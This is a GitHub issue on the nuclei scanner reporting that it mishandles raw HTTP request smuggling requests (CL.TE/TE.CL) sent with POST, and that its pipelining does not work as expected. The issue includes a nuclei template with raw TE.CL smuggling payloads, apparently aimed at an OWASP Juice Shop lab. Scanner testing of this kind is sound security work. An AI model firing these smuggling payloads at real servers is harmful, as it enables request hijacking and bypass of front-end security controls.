search

projectdiscovery / nuclei

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.
https://docs.projectdiscovery.io/tools/nuclei
MIT License
20.65k stars 2.51k forks source link

Nuclei doesn't process the raw request of HTTP request smuggling (CL.TE) or (TE.CL.), when the request is in POST method. #5416

Open shubham058 opened 3 months ago

shubham058 commented 3 months ago

Nuclei version:

3.2.9

Current Behavior:

While creating a template for TE.CL and CL.TE http request smuggling, and proxying it through burp to get an idea on how Nuclei treats the raw request in order to get the desired result, it was observed that if the request is in POST method and it has body starting with 0 (Transfer-encoding), nuclei will break the request there (basically simplifies it) and rest of the smuggling payload will be ignored.

If the request body has some size like 122 as in attachment and the request is in POST method, then nuclei will ignore size of transfer-encoding chunk which is 122 and keep the rest part of the body, which will throw unexpected behavior.

Reproduce.

  1. Potential HTTP request smuggling.

-> download the template "Potential-HTTP-request-smuggling" -> run using -> nuclei.exe -t -u -p -rl 4 -> refer screenshot "POST method simplified"

image

Potential-Http-request-smuggling - Copy.txt

The raw request is different and the request that nuclei make while running template is simplified. It seems, nuclei treat the "Transfer-Encoding" header while running and break it when it comes to the 0 byte, which it shouldn't be doing.

  1. http-request-smuggling-tecl

-> Download the template. -> run it using -> nuclei.exe -t -u -p -rl 4 -> Refer screenshot "Nuclei ignores the chunk size"

image

-> Nuclei template -> http-request-smuggling-tecl copy.txt

Note: - This behavior is just with the POST method, with GET everything works fine.

However, instead of threads, I tried to use Pipeline support to achieve the HTTP Pipelining and nuclei doesn't support it properly.

certain errors -> Could not execute request for "hostname" dialing to the given TCP address timed out

id: te-cl-smuggling

info:
  name: Test for te cl smuggling
  author: shubhams
  severity: medium
  description: Smuggling using Pipeline

http:
  - raw:
      - |+
        GET /login HTTP/1.1
        X: X
        Host: {{Host}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 4
        Transfer-Encoding: chunked

        122
        GET / HTTP/1.1
        Host: vulnerable-website.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 10

        x=1
        0

      - |+  
        GET /login HTTP/1.1
        X: X
        Host: {{Host}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 4
        Transfer-Encoding: chunked

        122
        GET / HTTP/1.1
        Host: vulnerable-website.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 10

        x=1
        0

    unsafe: true
    pipeline: true
    pipeline-concurrent-connections: 1
    pipeline-requests-per-connection: 2

    # matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - Juice Shop
          - "This is a deliberately vulnerable web application designed for testing web"

      - type: dsl
        dsl:
          - "len(body) > 11000"
shubham058 commented 3 months ago

Hello team,

Any update?